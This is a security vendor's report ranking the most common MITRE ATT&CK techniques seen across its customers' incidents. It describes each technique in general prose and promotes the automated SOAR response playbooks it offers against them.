SOAR solutions create a centralized queue of all incidents going on in a security team’s environment. Endpoint, SIEM, email, behavior, and network alerts are all collected inside of a holistic SOAR solution. As such, SOAR analytics are a unique way to understand your overall security environment and what threats you’re facing on a day-to-day basis.
D3 Labs analyzed 75,331 incidents in order to determine the 10 most common MITRE ATT&CK techniques. This dataset was derived from a subset of our customers who are based in North America and Europe.
In this report, you’ll see the findings of our study, as well as automated incident response playbooks you can deploy to ensure you have an effective answer to these threats.
About D3 Labs
D3 Labs represents the research and development backbone of D3 Security, consisting of a dedicated team of cybersecurity analysts, automation engineers, network architects, and threat researchers. This skilled group is tasked with simulating attacks, utilizing the same security tools employed by D3’s clients, to identify and bridge detection and response gaps within those tools. In addition to testing and refining cybersecurity measures, D3 Labs is instrumental in developing and maintaining an extensive library of industry-best integrations, thereby minimizing the complexity and number of steps clients need to incorporate into their playbooks, even for the most sophisticated and unique workflows.
What Are MITRE ATT&CK Tactics and Techniques?
MITRE ATT&CK is a globally accessible knowledgebase of adversary tactics and techniques based on real-world observations. In MITRE ATT&CK, tactics represent the “why” of an adversary’s actions—their objectives or goals during an attack. These include objectives like initial access, defense evasion, and execution. Each tactic includes many techniques, which represent the “how”—the specific methods adversaries use to achieve their tactical objectives, such as exploiting a software vulnerability, phishing, or keylogging.
Read: What Are MITRE ATT&CK and MITRE D3FEND?
Key Findings
The most commonly used method in our dataset is Command and Scripting Interpreter threats, accounting for 52.22% of incidents. This shows that malicious scripts are heavily relied upon for executing payloads. Phishing is the primary method used for initial access, responsible for 15.44% of incidents. Other less common techniques include brute force for credential access (2.05%), and more specific methods like OS credential dumping (1.37%) and persistence through account manipulation (1.34%). Other tactics and techniques collectively represent 13.56%, indicating the broad range of possible attack strategies. The following is an analysis of each technique, along with examples of incident response workflows that can be orchestrated using D3’s Smart SOAR platform.
Detection, Monitoring, and Response in Smart SOAR
D3’s Smart SOAR detects MITRE tactics and techniques in three different places: on ingestion, at the event level, and at the incident level. All MITRE detections are collected and displayed in the MITRE ATT&CK Monitor dashboard, which gives security professionals an at-a-glance view of their threat landscape. Users can create custom detection logic directly in the platform to ensure all data is relevant and up to date.
When an event or incident is tagged with a specific MITRE tactic or technique, the corresponding playbook can be attached to it, ensuring teams are following the right protocol for each unique threat. Here you can see an incident that has been categorized as a Credential Access: Brute Force threat, with the corresponding response playbook attached.
Tactic & Technique Tag
Incident Response Playbook
Analysis of Tactics and Techniques
Execution: Command and Scripting Interpreter (T1059)
Command and Scripting Interpreter threats, the most frequently detected technique at 52.22%, involve attackers leveraging popular scripting languages like PowerShell, Bash, Python, and JavaScript. These languages are used to create scripts that automate various malicious activities including data harvesting, system manipulation, and malware deployment without direct user interaction. For instance, an attacker might use a PowerShell script to download and execute a ransomware payload on a victim’s computer.
To evade detection and maintain their presence within compromised systems, attackers often employ scripting to circumvent security measures. They utilize scripts to alter or bypass the functionality of security solutions, such as antivirus tools, intrusion detection systems (IDS), and intrusion prevention systems (IPS), making their malicious activities harder to detect and counteract. This method highlights the sophisticated use of scripting to undermine system security and facilitate unauthorized access and control.
Incident Response Workflow for Scripting Attacks
The workflow above uses SentinelOne to monitor active agent processes and terminate malicious ones from within the Smart SOAR platform itself. Then, it uses Microsoft Entra ID (formerly Azure Active Directory) to change the device’s script execution policies and resets the user’s password. Implementing an incident response workflow means organizations can reduce the time between detection and containment for scripting attacks.
Initial Access: Phishing (T1566)
Phishing is a common technique used by attackers to gain initial access to a target’s systems or network. This method involves the deceptive practice of sending emails that appear to be from a trusted source to induce individuals to reveal personal information, such as passwords and credit card numbers, or to convince them to download and install malware.
A common indicator of a phishing attempt is mismatched URLs. Other common indicators include:
- Urgency – Messages that create a sense of immediate action or panic, like “Immediate Action Required.”
- Unknown Sender – Emails from unfamiliar or unusual addresses.
- Poor Grammar – Misspellings, grammar mistakes, or unusual phrasing.
- Generic Greetings – Phrases like “Dear Customer” instead of your name.
- Suspicious Attachments – Unexpected attachments or links.
- Mismatched URLs – Hyperlinks that don’t match the displayed text or lead to suspicious sites.
- Unusual Requests – Requests for sensitive information or money that seem out of place.
Incident Response Workflow for Phishing Attacks
We’ve written a full blog on how to use SOAR to defend against phishing attacks. One of our many workflows for phishing is illustrated above. In this workflow, which activates during the containment stage, Okta is used to deactivate the compromised account, then Microsoft Defender for Endpoint is used to isolate the host and quarantine the file. At the same time Office 365 is used to delete the email and Zscaler is used to block access to a malicious URL or IP address with which the device may be communicating.
Phishing and spear-phishing attacks represent a significant threat as they often serve as the entry point for more sophisticated attacks. Defending against these attacks requires a combination of technical controls, user education, and robust security policies. By understanding the nature of these threats and implementing a layered defense strategy, organizations can significantly reduce their risk of falling victim to phishing and spear-phishing campaigns.
Initial Access: Valid Accounts (T1078)
The tactic of using valid accounts involves the exploitation of legitimate user credentials—such as usernames and passwords—to bypass security measures and gain unauthorized access to systems and data. This tactic is particularly dangerous because it can allow attackers to operate undetected for extended periods, blending in with normal user activities.
Incident Response Workflow for Valid Account Threats
The workflow above is an example of how SOAR users can automate incident response to valid account threats. It monitors user activity logs for location anomalies, comparing the detected IP locations against the users’ expected locations to identify potential unauthorized access attempts then verifies with the user before initiating a response. The verification is conducted through a secure method, ensuring the user’s legitimate confirmation of a potential breach.
Initial Access: Spearphishing (T1566.001-004)
Spear phishing is a targeted email attack aimed at specific individuals or organizations. Standard phishing targets many recipients with generic messages. Spear phishing works by personalizing messages using collected personal information. Spear phishing emails are reportedly opened by targets in 70% of cases, compared to a 3% open rate for mass spam emails. Recognizing spear phishing helps users strengthen cybersecurity defenses.
As a sub-technique of T1566 (Phishing), spearphishing is more precise in that the attacks target a specific user or organization. Incident response playbooks can assist in this scenario by flagging potentially high-value target accounts such as the Chief Executive Officer. In Smart SOAR, the event playbook can be used to identify threats involving specific user accounts and escalate them in order to ensure the executive’s account has not been compromised and the company’s employees are aware of the active spearphishing campaign.
Following this escalation, incident response playbooks can be used to force a password reset and refresh user sign-in sessions using popular identity and access management (IAM) tools.
Credential Access: Brute Force (T1110)
Credential access through brute force is a method employed by attackers to gain unauthorized access to a system or application by systematically trying every possible combination of usernames and passwords until the correct one is found. This approach exploits weak password policies, such as the use of common or default passwords, and relies on the absence of account lockout mechanisms or insufficient rate-limiting controls.
Incident Response Workflow for Brute Force Attacks
Similar to phishing, we’ve written a lengthy description of how to build a SOAR playbook to address brute force attacks. It’s also designed following MITRE D3FEND best practices.
Brute force attacks are rudimentary, yet, as our research shows, they are still a prevalent threat in the cybersecurity landscape, exploiting weak password practices and inadequate security policies. By implementing strong defensive measures, including robust password policies, MFA, and continuous monitoring, organizations can significantly mitigate the risk of unauthorized access through brute force methods. Educating users on secure password practices further reinforces an organization’s defense against these types of attacks.
Credential Access: OS Credential Dumping (T1003)
After initial access, attackers may try to exfiltrate identity information from domain controllers by targeting files such as Ntds.dit. With this information, attackers may elevate their privileges and access sensitive intellectual property.
Incident Response Workflow for OS Credential Dumping Threats
Playbooks like the one above can be used to confirm Credential Dumping alerts and implement mitigation strategies, such as adding compromised user accounts to protected groups in Microsoft Entra ID and notifying local administrators of password complexity requirements.
Persistence: Account Manipulation (T1098)
Persistence through account manipulation involves attackers altering user account properties to maintain access to a compromised system. This technique can include changing permissions to elevate privileges, modifying account credentials to prevent detection, or creating new accounts entirely. Such actions ensure attackers can persistently access or control systems, often bypassing normal authentication and authorization processes.
Incident Response Workflow for Account Manipulation
The workflow above uses AWS IAM to manage individual user permissions. IAM tools can be used within SOAR to verify a user’s expected access and make changes to their profile from the SOAR interface itself. In this example, an unexpected user policy is removed.
Closing Thoughts
D3 Labs’ analysis of the 10 most common MITRE ATT&CK techniques offers crucial insights into today’s cybersecurity challenges. Among the core findings, adversaries’ continued use of established techniques, such as Command and Scripting Interpreter threats and Phishing, is particularly noteworthy. This reliance on familiar methods paints a picture of a threat landscape where traditional attack vectors remain prominent.
The report also sheds light on the importance of effective process monitoring and the capability to take immediate action against threats, particularly in the context of scripting attacks and unauthorized account access. It underscores the fact that attackers not only exploit technical vulnerabilities but also leverage legitimate system and network functions to their advantage.
D3 Labs’ findings emphasize the need for organizations to reassess and strengthen their cybersecurity frameworks in light of persistent and evolving threats. Highlighting the significance of rapid detection and response capabilities against scripting attacks and unauthorized access, the data illustrates the need for an automation-assisted approach to incident response.
